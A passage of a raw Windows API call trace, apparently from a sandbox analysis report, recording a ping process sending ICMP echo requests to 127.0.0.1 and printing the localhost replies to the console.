[0068.054] IcmpCreateFile () returned 0xeb6bf0 [0068.405] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xebc318 [0068.405] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xec5270 [0068.405] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xb3f128, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0068.407] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="竈ì林³┗\x94䰨盪❋") returned 0x14 [0068.407] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.407] _fileno (_File=0x76ea4c28) returned 1 [0068.407] _get_osfhandle (_FileHandle=1) returned 0x28 [0068.407] GetFileType (hFile=0x28) returned 0x2 [0068.407] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0068.407] GetLastError () returned 0x6 [0068.407] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³❋") returned 0x0 [0068.408] _fileno (_File=0x76ea4c28) returned 1 [0068.408] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0068.408] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0068.408] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xec7b00 [0068.408] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xec7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0068.408] _fileno (_File=0x76ea4c28) returned 1 [0068.408] _write (in: _FileHandle=1, _Buf=0xec7b00*, _MaxCharCount=0x14 | out: _Buf=0xec7b00*) returned 20 [0068.408] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.408] _fileno (_File=0x76ea4c28) returned 1 [0068.408] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0068.408] LocalFree (hMem=0xec7b00) returned 0x0 [0068.408] LocalFree (hMem=0xec7ac8) returned 0x0 [0068.408] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="竈ì林³▪\x94䰨盪❚") returned 0x18 [0068.408] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.408] _fileno (_File=0x76ea4c28) returned 1 [0068.408] _get_osfhandle (_FileHandle=1) returned 0x28 [0068.408] GetFileType (hFile=0x28) returned 0x2 [0068.408] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0068.408] GetLastError () returned 0x6 [0068.408] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³❚") returned 0x0 [0068.408] _fileno (_File=0x76ea4c28) returned 1 [0068.408] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0068.408] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0068.408] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xebc188 [0068.408] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xebc188, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0068.408] _fileno (_File=0x76ea4c28) returned 1 [0068.408] _write (in: _FileHandle=1, _Buf=0xebc188*, _MaxCharCount=0x18 | out: _Buf=0xebc188*) returned 24 [0068.408] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.408] _fileno (_File=0x76ea4c28) returned 1 [0068.408] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0068.408] LocalFree (hMem=0xebc188) returned 0x0 [0068.408] LocalFree (hMem=0xec7ac8) returned 0x0 [0068.408] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0068.409] IcmpSendEcho2Ex (in: IcmpHandle=0xeb6bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xebc318, RequestSize=0x20, RequestOptions=0xb3f09c, ReplyBuffer=0xec5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xec5270) returned 0x1 [0068.420] InetNtopW (in: Family=2, pAddr=0xb3f08c, pStringBuf=0xb3f1b4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0068.420] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="笈ì林³⛔\x94䰨盪✣") returned 0x16 [0068.420] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.420] _fileno (_File=0x76ea4c28) returned 1 [0068.420] _get_osfhandle (_FileHandle=1) returned 0x28 [0068.420] GetFileType (hFile=0x28) returned 0x2 [0068.420] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0068.420] GetLastError () returned 0x6 [0068.420] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³✣") returned 0x0 [0068.420] _fileno (_File=0x76ea4c28) returned 1 [0068.420] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0068.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0068.420] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xec7b40 [0068.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xec7b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0068.420] _fileno (_File=0x76ea4c28) returned 1 [0068.420] _write (in: _FileHandle=1, _Buf=0xec7b40*, _MaxCharCount=0x16 | out: _Buf=0xec7b40*) returned 22 [0068.420] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.420] _fileno (_File=0x76ea4c28) returned 1 [0068.420] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0068.420] LocalFree (hMem=0xec7b40) returned 0x0 [0068.420] LocalFree (hMem=0xec7b08) returned 0x0 [0068.420] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="笈ì林³⛿\x94䰨盪✼") returned 0x9 [0068.421] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.421] _fileno (_File=0x76ea4c28) returned 1 [0068.421] _get_osfhandle (_FileHandle=1) returned 0x28 [0068.421] GetFileType (hFile=0x28) returned 0x2 [0068.421] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0068.421] GetLastError () returned 0x6 [0068.421] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³✼") returned 0x0 [0068.421] _fileno (_File=0x76ea4c28) returned 1 [0068.421] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0068.421] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.421] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xeb89b8 [0068.421] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xeb89b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0068.421] _fileno (_File=0x76ea4c28) returned 1 [0068.421] _write (in: _FileHandle=1, _Buf=0xeb89b8*, _MaxCharCount=0x9 | out: _Buf=0xeb89b8*) returned 9 [0068.421] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.421] _fileno (_File=0x76ea4c28) returned 1 [0068.421] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0068.421] LocalFree (hMem=0xeb89b8) returned 0x0 [0068.421] LocalFree (hMem=0xec7b08) returned 0x0 [0068.421] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xb3f024, nSize=0x0, Arguments=0xb3f020 | out: lpBuffer="笈ì林³➷\x94䰨盪✧") returned 0x9 [0068.421] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.421] _fileno (_File=0x76ea4c28) returned 1 [0068.421] _get_osfhandle (_FileHandle=1) returned 0x28 [0068.421] GetFileType (hFile=0x28) returned 0x2 [0068.421] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe8 | out: lpMode=0xb3efe8) returned 0 [0068.421] GetLastError () returned 0x6 [0068.421] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef4c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0068.421] _fileno (_File=0x76ea4c28) returned 1 [0068.421] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0068.421] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.421] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xeb8aa8 [0068.421] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xeb8aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0068.421] _fileno (_File=0x76ea4c28) returned 1 [0068.421] _write (in: _FileHandle=1, _Buf=0xeb8aa8*, _MaxCharCount=0x9 | out: _Buf=0xeb8aa8*) returned 9 [0068.421] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.421] _fileno (_File=0x76ea4c28) returned 1 [0068.421] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0068.421] LocalFree (hMem=0xeb8aa8) returned 0x0 [0068.421] LocalFree (hMem=0xec7b08) returned 0x0 [0068.421] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="笈ì林³⟘\x94䰨盪✨") returned 0x9 [0068.421] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.421] _fileno (_File=0x76ea4c28) returned 1 [0068.421] _get_osfhandle (_FileHandle=1) returned 0x28 [0068.421] GetFileType (hFile=0x28) returned 0x2 [0068.421] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0068.421] GetLastError () returned 0x6 [0068.421] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³✨") returned 0x0 [0068.421] _fileno (_File=0x76ea4c28) returned 1 [0068.421] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0068.421] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.421] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xeb89b8 [0068.422] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xeb89b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0068.422] _fileno (_File=0x76ea4c28) returned 1 [0068.422] _write (in: _FileHandle=1, _Buf=0xeb89b8*, _MaxCharCount=0x9 | out: _Buf=0xeb89b8*) returned 9 [0068.422] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0068.422] _fileno (_File=0x76ea4c28) returned 1 [0068.422] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0068.422] LocalFree (hMem=0xeb89b8) returned 0x0 [0068.422] LocalFree (hMem=0xec7b08) returned 0x0 [0068.422] Sleep (dwMilliseconds=0x3e8) [0069.432] IcmpSendEcho2Ex (in: IcmpHandle=0xeb6bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xebc318, RequestSize=0x20, RequestOptions=0xb3f09c, ReplyBuffer=0xec5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xec5270) returned 0x1 [0069.433] InetNtopW (in: Family=2, pAddr=0xb3f08c, pStringBuf=0xb3f1b4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0069.433] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="羠ì林³⛔\x94䰨盪✣") returned 0x16 [0069.433] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0069.433] _fileno (_File=0x76ea4c28) returned 1 [0069.433] _get_osfhandle (_FileHandle=1) returned 0x28 [0069.433] GetFileType (hFile=0x28) returned 0x2 [0069.433] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0069.433] GetLastError () returned 0x6 [0069.433] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³✣") returned 0x0 [0069.433] _fileno (_File=0x76ea4c28) returned 1 [0069.433] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0069.433] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0069.433] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xec7fd8 [0069.433] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xec7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0069.433] _fileno (_File=0x76ea4c28) returned 1 [0069.433] _write (in: _FileHandle=1, _Buf=0xec7fd8*, _MaxCharCount=0x16 | out: _Buf=0xec7fd8*) returned 22 [0069.433] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0069.433] _fileno (_File=0x76ea4c28) returned 1 [0069.433] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0069.433] LocalFree (hMem=0xec7fd8) returned 0x0 [0069.433] LocalFree (hMem=0xec7fa0) returned 0x0 [0069.434] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="羠ì林³⛿\x94䰨盪✼") returned 0x9 [0069.434] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0069.434] _fileno (_File=0x76ea4c28) returned 1 [0069.434] _get_osfhandle (_FileHandle=1) returned 0x28 [0069.434] GetFileType (hFile=0x28) returned 0x2 [0069.434] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0069.434] GetLastError () returned 0x6 [0069.434] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³✼") returned 0x0 [0069.434] _fileno (_File=0x76ea4c28) returned 1 [0069.434] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0069.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.434] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xeb8aa8 [0069.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xeb8aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0069.434] _fileno (_File=0x76ea4c28) returned 1 [0069.434] _write (in: _FileHandle=1, _Buf=0xeb8aa8*, _MaxCharCount=0x9 | out: _Buf=0xeb8aa8*) returned 9 [0069.434] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0069.434] _fileno (_File=0x76ea4c28) returned 1 [0069.434] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0069.434] LocalFree (hMem=0xeb8aa8) returned 0x0 [0069.434] LocalFree (hMem=0xec7fa0) returned 0x0 [0069.434] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xb3f024, nSize=0x0, Arguments=0xb3f020 | out: lpBuffer="羠ì林³➷\x94䰨盪✧") returned 0x9 [0069.434] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0069.434] _fileno (_File=0x76ea4c28) returned 1 [0069.434] _get_osfhandle (_FileHandle=1) returned 0x28 [0069.434] GetFileType (hFile=0x28) returned 0x2 [0069.434] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe8 | out: lpMode=0xb3efe8) returned 0 [0069.434] GetLastError () returned 0x6 [0069.434] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef4c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0069.434] _fileno (_File=0x76ea4c28) returned 1 [0069.434] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0069.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.434] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xeb8ac0 [0069.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xeb8ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0069.434] _fileno (_File=0x76ea4c28) returned 1 [0069.434] _write (in: _FileHandle=1, _Buf=0xeb8ac0*, _MaxCharCount=0x9 | out: _Buf=0xeb8ac0*) returned 9 [0069.434] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0069.434] _fileno (_File=0x76ea4c28) returned 1 [0069.434] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0069.434] LocalFree (hMem=0xeb8ac0) returned 0x0 [0069.434] LocalFree (hMem=0xec7fa0) returned 0x0 [0069.434] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="羠ì林³⟘\x94䰨盪✨") returned 0x9 [0069.434] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0069.434] _fileno (_File=0x76ea4c28) returned 1 [0069.434] _get_osfhandle (_FileHandle=1) returned 0x28 [0069.434] GetFileType (hFile=0x28) returned 0x2 [0069.434] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0069.434] GetLastError () returned 0x6 [0069.434] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³✨") returned 0x0 [0069.434] _fileno (_File=0x76ea4c28) returned 1 [0069.434] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0069.435] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.435] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xeb8ac0 [0069.435] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xeb8ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0069.435] _fileno (_File=0x76ea4c28) returned 1 [0069.435] _write (in: _FileHandle=1, _Buf=0xeb8ac0*, _MaxCharCount=0x9 | out: _Buf=0xeb8ac0*) returned 9 [0069.435] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0069.435] _fileno (_File=0x76ea4c28) returned 1 [0069.435] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0069.435] LocalFree (hMem=0xeb8ac0) returned 0x0 [0069.435] LocalFree (hMem=0xec7fa0) returned 0x0 [0069.435] Sleep (dwMilliseconds=0x3e8) [0070.442] IcmpSendEcho2Ex (in: IcmpHandle=0xeb6bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xebc318, RequestSize=0x20, RequestOptions=0xb3f09c, ReplyBuffer=0xec5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xec5270) returned 0x1 [0070.443] InetNtopW (in: Family=2, pAddr=0xb3f08c, pStringBuf=0xb3f1b4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0070.443] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="羠ì林³⛔\x94䰨盪✣") returned 0x16 [0070.443] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.443] _fileno (_File=0x76ea4c28) returned 1 [0070.443] _get_osfhandle (_FileHandle=1) returned 0x28 [0070.443] GetFileType (hFile=0x28) returned 0x2 [0070.443] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0070.443] GetLastError () returned 0x6 [0070.443] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³✣") returned 0x0 [0070.443] _fileno (_File=0x76ea4c28) returned 1 [0070.443] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0070.443] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.443] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xec7fd8 [0070.443] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xec7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0070.443] _fileno (_File=0x76ea4c28) returned 1 [0070.443] _write (in: _FileHandle=1, _Buf=0xec7fd8*, _MaxCharCount=0x16 | out: _Buf=0xec7fd8*) returned 22 [0070.443] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.443] _fileno (_File=0x76ea4c28) returned 1 [0070.443] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0070.443] LocalFree (hMem=0xec7fd8) returned 0x0 [0070.443] LocalFree (hMem=0xec7fa0) returned 0x0 [0070.443] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="羠ì林³⛿\x94䰨盪✼") returned 0x9 [0070.443] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.443] _fileno (_File=0x76ea4c28) returned 1 [0070.443] _get_osfhandle (_FileHandle=1) returned 0x28 [0070.443] GetFileType (hFile=0x28) returned 0x2 [0070.443] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0070.443] GetLastError () returned 0x6 [0070.443] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³✼") returned 0x0 [0070.443] _fileno (_File=0x76ea4c28) returned 1 [0070.443] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0070.443] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.443] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xeb8a30 [0070.443] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xeb8a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0070.443] _fileno (_File=0x76ea4c28) returned 1 [0070.444] _write (in: _FileHandle=1, _Buf=0xeb8a30*, _MaxCharCount=0x9 | out: _Buf=0xeb8a30*) returned 9 [0070.444] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.444] _fileno (_File=0x76ea4c28) returned 1 [0070.444] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0070.444] LocalFree (hMem=0xeb8a30) returned 0x0 [0070.444] LocalFree (hMem=0xec7fa0) returned 0x0 [0070.444] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xb3f024, nSize=0x0, Arguments=0xb3f020 | out: lpBuffer="羠ì林³➷\x94䰨盪✧") returned 0x9 [0070.444] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.444] _fileno (_File=0x76ea4c28) returned 1 [0070.444] _get_osfhandle (_FileHandle=1) returned 0x28 [0070.444] GetFileType (hFile=0x28) returned 0x2 [0070.444] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe8 | out: lpMode=0xb3efe8) returned 0 [0070.444] GetLastError () returned 